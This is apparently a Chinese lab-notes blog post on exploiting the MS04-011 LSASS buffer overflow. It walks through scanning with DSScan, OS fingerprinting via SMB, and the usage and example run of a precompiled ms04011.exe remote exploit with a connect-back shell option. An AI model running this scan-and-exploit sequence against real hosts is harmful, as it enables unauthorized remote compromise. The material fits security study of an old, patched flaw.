缓冲区溢出漏洞 ms04011
2024-09-01 22:57:17
DSScan使用
扫描目标主机是否存在ms04011漏洞
getos使用
获取操作系统类型
> getos.exe 192.168.1.101
-------------------------------------------------------
THCsmbgetOS v0.1 - gets group, server and os via SMB
by Johnny Cyberpunk (jcyberpunk@thc.org)
-------------------------------------------------------
[*] Connecting Port 139....
[*] Sending session request....
[*] Sending negotiation request....
[*] Sending setup account request....
[*] Successful....
Remote OS:
----------
WORKGROUP
Windows 2000 LAN Manager
Windows 5.1
ms04011使用
//帮助
> ms04011.exe
Windows Lsasrv.dll RPC [ms04011] buffer overflow Remote Exploit
bug discoveried by eEye,
code by sbaa(sysop@sbaa.3322.org) 2004/04/24 ver 0.
Usage:
ms04011.exe 0 targetip (Port ConnectBackIP )
----> attack 2k (tested on cn sp4,en
ms04011.exe 1 targetip (Port ConnectBackIP )
----> attack xp (tested on cn sp1)
//举例
> ms04011.exe 1 192.168.1.101
shellcode size 404
Ret value = 1726 //1726代表溢出成功
最新文章
- Django Restful Framework (一): Serializer
- 【Thinking in Java】Java Callable的使用
- postgresql导入及导出
- TML5如何在移动网页端调用手机图片或者camera
- c# 递归
- 在VMware上安装CentOS-6.5 minimal - 配置网络
- BZOJ2459 : [BeiJing2011]神秘好人
- Duilib中系统消息在自己窗口类的使用
- Codeforces Round #111 (Div. 2)
- iOS NSString的常用用法
- ie、IE兼容模式,提示SCRIPT1028: 缺少标识符、字符串或数字
- DJANGO技巧两则:模拟MKDIR -P及配合NGINX上传大文件不使超时
- poj 1329 Circle Through Three Points(求圆心+输出)
- php流行笔试题及答案
- ios 打电话结束返回到应用中
- Cortex-M3知识点
- linux 修改文件、文件夹权限
- 后台数据download成excel的方法(controller/action)
- 循环语句for,while,until,select
- C#学习笔记-装饰模式
热门文章
- 【FPGA】always (*) 后代码全部显示注释字体的颜色之解决方法
- Manifest中meta-data扩展元素数据的配置与获取
- android为什么不允许新开启一个线程来更新UI,而是用handler来更新界面
- session与getSession()用法总结
- 如何使用phantomJS来模拟一个HTML元素的鼠标悬停
- Ajax验证
- Celery-系统守护进程
- [Linux] cronjob指定用户运行脚本,并按日期区分输出日志
- WeQuant教程—1.5 实盘运行须知
- django:删除表后怎么重新数据迁移生成表